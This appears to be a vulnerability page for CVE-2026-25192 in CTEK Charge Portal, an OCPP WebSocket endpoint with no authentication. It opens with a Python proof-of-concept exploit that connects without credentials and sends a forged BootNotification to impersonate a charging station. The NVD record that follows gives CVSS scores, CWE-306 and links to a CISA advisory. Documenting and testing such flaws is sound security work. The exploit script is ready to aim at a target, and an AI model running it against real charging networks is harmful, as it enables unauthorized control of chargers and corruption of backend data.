CVE-2026-25192

import websocket import json # PoC for CVE-2026-25192: Unauthenticated OCPP Connection # Description: Connect to the vulnerable WebSocket endpoint without credentials # and impersonate a charging station. def exploit_ocpp(target_host, charge_box_id): # Construct the WebSocket URL (usually /ocpp or similar) ws_url = f"ws://{target_host}/ocpp" try: print(f"[*] Connecting to {ws_url} as {charge_box_id}...") # Establish connection without authentication headers ws = websocket.create_connection(ws_url) # Craft a malicious BootNotification message (OCPP 1.6) payload = [ 2, "1", "BootNotification", { "chargePointVendor": "AttackerVendor", "chargePointModel": "PoCModel", "chargePointSerialNumber": "Hacked001" } ] print("[*] Sending malicious BootNotification...") ws.send(json.dumps(payload)) # Wait for response from the central system response = ws.recv() print(f"[+] Server Response: {response}") # If accepted, we can now send other commands (e.g., MeterValues, StatusNotification) print("[+] Impersonation successful. Attacker can now issue OCPP commands.") ws.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and a valid/known ChargeBox ID target = "192.168.1.100" cbox_id = "CP001" exploit_ocpp(target, cbox_id)

{"cve": {"id": "CVE-2026-25192", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:42.780", "lastModified": "2026-05-06T15:19:41.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebSocket endpoints lack proper authentication mechanisms, enabling attackers to perform unauthorized station impersonation and manipulate data sent to the backend. An unauthenticated attacker can connect to the OCPP WebSocket endpoint using a known or discovered charging station identifier, then issue or receive OCPP commands as a legitimate charger. Given that no authentication is required, this can lead to privilege escalation, unauthorized control of charging\ninfrastructure, and corruption of charging network data reported to the backend."}, {"lang": "es", "value": "Los puntos finales WebSocket carecen de mecanismos de autenticación adecuados, lo que permite a los atacantes realizar suplantación de estación no autorizada y manipular datos enviados al backend. Un atacante no autenticado puede conectarse al punto final WebSocket OCPP utilizando un identificador de estación de carga conocido o descubierto, luego emitir o recibir comandos OCPP como un cargador legítimo. Dado que no se requiere autenticación, esto puede llevar a la escalada de privilegios, control no autorizado de la infraestructura de carga y corrupción de los datos de la red de carga informados al backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctek:charge_portal:-:*:*:*:*:*:*:*", "matchCriteriaId": "C757F5E2-F4E7-464D-9184-BD665287E411"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-078-06.json", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-078-06", "source": "[email protected]", "tags": ["US Government Resource", "Third Party Advisory"]}, {"url": "https://www.ctek.com/support", "source": "[email protected]", "tags": ["Product"]}]}}